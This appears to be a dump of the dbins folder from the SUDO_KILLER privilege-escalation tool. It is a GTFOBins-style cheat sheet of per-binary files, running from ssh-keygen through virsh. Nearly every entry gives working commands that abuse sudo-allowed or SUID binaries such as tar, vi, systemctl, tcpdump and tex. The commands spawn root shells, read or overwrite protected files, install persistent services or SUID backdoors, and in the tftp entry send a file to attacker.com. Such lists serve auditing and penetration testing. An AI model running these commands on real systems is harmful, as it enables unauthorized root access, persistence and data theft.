5 | * sudo ssh-keygen -D ./lib.so 6 | -------------------------------------------------------------------------------- /dbins/ssh-keyscan.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ssh-keyscan -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ssh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Spawn interactive root shell through ProxyCommand option. 6 | sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x 7 | -------------------------------------------------------------------------------- /dbins/sshpass.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sshpass /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/start-stop-daemon.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo start-stop-daemon -n $RANDOM -S -x /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/stdbuf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo stdbuf -i0 /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/strace.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo strace -o /dev/null /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/strings.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo strings "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/su.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo su 6 | -------------------------------------------------------------------------------- /dbins/sudo.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sudo /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/sysctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * COMMAND='/bin/sh -c id>/tmp/id' 6 | sudo sysctl "kernel.core_pattern=|$COMMAND" 7 | sleep 9999 & 8 | kill -QUIT $! 9 | cat /tmp/id 10 | -------------------------------------------------------------------------------- /dbins/syst-resolve.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/syst-resolve.txt -------------------------------------------------------------------------------- /dbins/systemctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * Passing SYSTEMD_EDITOR on the sudo command line is only accepted if the 6 | sudoers rule carries the SETENV tag (implied when the command is ALL) or the 7 | setenv option is enabled; otherwise sudo refuses to set the variable. 8 | TF=$(mktemp) 9 | echo /bin/sh >$TF 10 | chmod +x $TF 11 | sudo SYSTEMD_EDITOR=$TF systemctl edit system.slice 12 | * This installs a persistent unit that also runs at every boot; remove it 13 | afterwards with systemctl disable --now and delete the linked file. 14 | TF=$(mktemp).service 15 | echo '[Service] 16 | Type=oneshot 17 | ExecStart=/bin/sh -c "id > /tmp/output" 18 | [Install] 19 | WantedBy=multi-user.target' > $TF 20 | sudo systemctl link $TF 21 | sudo systemctl enable --now $TF 22 | * This invokes the default pager (normally less) only when stdout is a 23 | terminal and the output does not fit on one screen; with --no-pager, or with 24 | SYSTEMD_PAGER or PAGER set to cat, no pager is started. From less, !sh spawns 25 | a shell as root (less refuses shell escapes when LESSSECURE is set). 26 | sudo systemctl 27 | !sh 28 | -------------------------------------------------------------------------------- /dbins/systemd-resolve.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager (normally less) only when stdout is a 6 | terminal and the output does not fit on one screen; with --no-pager, or with 7 | SYSTEMD_PAGER or PAGER set to cat, no pager is started. From less, !sh 8 | spawns a shell as root. 9 | sudo systemd-resolve --status 10 | !sh 11 | -------------------------------------------------------------------------------- /dbins/tac.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo tac -s 'RANDOM' "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/tail.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo tail -c1G "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/tar.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Requires GNU tar: --checkpoint and --checkpoint-action are not implemented 6 | by bsdtar or busybox tar. The option must be given as a single argument. 7 | sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh 8 | ***** Limited SUID ***** 9 | If the binary has the SUID bit set, it may be abused to access the file system, 10 | escalate or maintain access with elevated privileges working as a SUID 11 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 12 | it only works on systems like Debian (<= Stretch) that allow the default sh 13 | shell to run with SUID privileges. 14 | This example creates a local SUID copy of the binary and runs it to maintain 15 | elevated privileges. To interact with an existing SUID binary skip the first 16 | command and run the program using its original path. tar hands the action to 17 | /bin/sh -c, so if /bin/sh is bash (which drops the effective uid unless 18 | started with -p) quote the action so the flag reaches the spawned shell: 19 | --checkpoint-action='exec=/bin/sh -p'. 20 | * sudo install -m =xs $(which tar) . 21 | 22 | ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh 23 | -------------------------------------------------------------------------------- /dbins/task.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo task execute /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/taskset.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo taskset 1 /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/tasksh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tasksh 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which tasksh) . 17 | 18 | ./tasksh 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/tbl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo tbl "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/tclsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tclsh 6 | exec /bin/sh <@stdin >@stdout 2>@stderr 7 | -------------------------------------------------------------------------------- /dbins/tcpdump.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The -z post-rotate script is executed when the capture file rotates, which 6 | -G 1 -W 1 forces after one second. -Z root keeps tcpdump running as root; 7 | without it, builds that drop privileges to an unprivileged capture user by 8 | default would run the script unprivileged. 9 | COMMAND='id' 10 | TF=$(mktemp) 11 | echo "$COMMAND" > $TF 12 | chmod +x $TF 13 | sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root 14 | -------------------------------------------------------------------------------- /dbins/tdbtool.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tdbtool 6 | ! /bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. 
To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which tdbtool) . 17 | 18 | ./tdbtool 19 | ! /bin/sh 20 | -------------------------------------------------------------------------------- /dbins/tee.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | echo DATA | sudo tee -a "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/terraform.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo terraform console 6 | file("file_to_read") 7 | -------------------------------------------------------------------------------- /dbins/tex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tex --shell-escape '\write18{/bin/sh}\end' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 
12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which tex) . 16 | 17 | ./tex --shell-escape '\write18{/bin/sh}\end' 18 | -------------------------------------------------------------------------------- /dbins/tftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Send local file to a TFTP server. 6 | RHOST=attacker.com 7 | sudo tftp $RHOST 8 | put file_to_send 9 | -------------------------------------------------------------------------------- /dbins/tic.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo tic -C "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/time.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo /usr/bin/time /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/timedatectl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo timedatectl list-timezones 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/timeout.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo timeout --foreground 7d /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/tmate.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tmate -c /bin/sh 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 
15 | * sudo install -m =xs $(which tmate) . 16 | 17 | ./tmate -c /bin/sh 18 | -------------------------------------------------------------------------------- /dbins/tmux.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tmux 6 | -------------------------------------------------------------------------------- /dbins/top.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This requires that root's top configuration file is writable by the 6 | caller, which is unusual since /root is normally mode 0700 (older procps 7 | versions read /root/.toprc instead); it is mainly a way to persist elevated 8 | privileges. printf is used because echo -e is not portable across shells. 9 | printf 'pipe\tx\texec /bin/sh 1>&0 2>&0\n' >>/root/.config/procps/toprc 10 | sudo top 11 | # press return twice 12 | reset 13 | -------------------------------------------------------------------------------- /dbins/torify.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo torify /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/torsocks.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo torsocks /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/troff.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo troff $LFILE 7 | -------------------------------------------------------------------------------- /dbins/tshark.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/tshark.txt -------------------------------------------------------------------------------- /dbins/ul.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ul "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/unexpand.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo unexpand -t99999999 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/uniq.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo uniq "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/unshare.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo unshare /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/unsquashfs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The image shell must be prepared beforehand (on any machine) with mksquashfs 6 | from a directory holding a copy of sh that is owned by root (use -all-root 7 | when not building as root) and has the SUID bit set. unsquashfs run as root 8 | recreates the file with that owner and mode; -p keeps the effective uid in 9 | shells that would otherwise drop it. 10 | sudo unsquashfs shell 11 | ./squashfs-root/sh -p 12 | -------------------------------------------------------------------------------- /dbins/unzip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * shell.zip must be prepared beforehand and contain a copy of sh whose stored 6 | mode has the SUID bit set (chmod u+s before zipping). Extracting as root makes 7 | the file root-owned, and -K keeps the setuid/setgid bits that unzip would 8 | otherwise strip; -p keeps the effective uid in shells that would drop it. 9 | sudo unzip -K shell.zip 10 | ./sh -p 11 | -------------------------------------------------------------------------------- /dbins/update-alternatives.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Makes $LFILE a symlink (through /etc/alternatives/x) to $TF, so anything 6 | reading $LFILE sees DATA; the content itself stays in the caller-owned 7 | temporary file, and the alternative named x remains registered afterwards. 8 | LFILE=/path/to/file_to_write 9 | TF=$(mktemp) 10 | echo DATA >$TF 11 | sudo update-alternatives --force --install "$LFILE" x "$TF" 0 12 | -------------------------------------------------------------------------------- /dbins/update/newAdd/notes.md: -------------------------------------------------------------------------------- 1 | This folder should not be deleted! It will be used as a temporary location for new and downloaded dangerous bins. 2 | -------------------------------------------------------------------------------- /dbins/uudecode.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Note that in this invocation the privileged read is performed by uuencode; 6 | uudecode only decodes the stream as the caller, so the sudo rule must allow 7 | uuencode for this to work. 8 | LFILE=file_to_read 9 | sudo uuencode "$LFILE" /dev/stdout | uudecode 10 | -------------------------------------------------------------------------------- /dbins/uuencode.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo uuencode "$LFILE" /dev/stdout | uudecode 7 | -------------------------------------------------------------------------------- /dbins/vagrant.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The Vagrantfile is Ruby evaluated by vagrant before any VM work starts, so 6 | the exec replaces the vagrant process with a shell. vagrant itself must be run 7 | through sudo for that shell to be privileged. 8 | cd $(mktemp -d) 9 | echo 'exec "/bin/sh"' > Vagrantfile 10 | sudo vagrant up 11 | -------------------------------------------------------------------------------- /dbins/valgrind.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo valgrind /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/varnishncsa.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/vi.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo vi -c ':!/bin/sh' /dev/null 6 | -------------------------------------------------------------------------------- /dbins/viff.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/viff.txt -------------------------------------------------------------------------------- /dbins/vigr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * vigr opens /etc/group (or /etc/gshadow with -s) as root in the editor named 6 | by VISUAL or EDITOR, falling back to vi; sudo's env_reset normally strips 7 | those variables unless they are in env_keep. From vi, :!/bin/sh gives a root 8 | shell, or the group file can simply be edited in place. 9 | sudo vigr 10 | -------------------------------------------------------------------------------- /dbins/vipw.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * vipw opens /etc/passwd (or /etc/shadow with -s) as root in the editor named 6 | by VISUAL or EDITOR, falling back to vi; sudo's env_reset normally strips 7 | those variables unless they are in env_keep. From vi, :!/bin/sh gives a root 8 | shell, or the password file can simply be edited in place. 9 | sudo vipw 10 | -------------------------------------------------------------------------------- /dbins/virsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * SCRIPT=script_to_run 6 | TF=$(mktemp) 7 | cat > $TF << EOF 8 | 9 | x 10 | 11 | hvm 12 | 13 | 1 14 | 15 | 16 |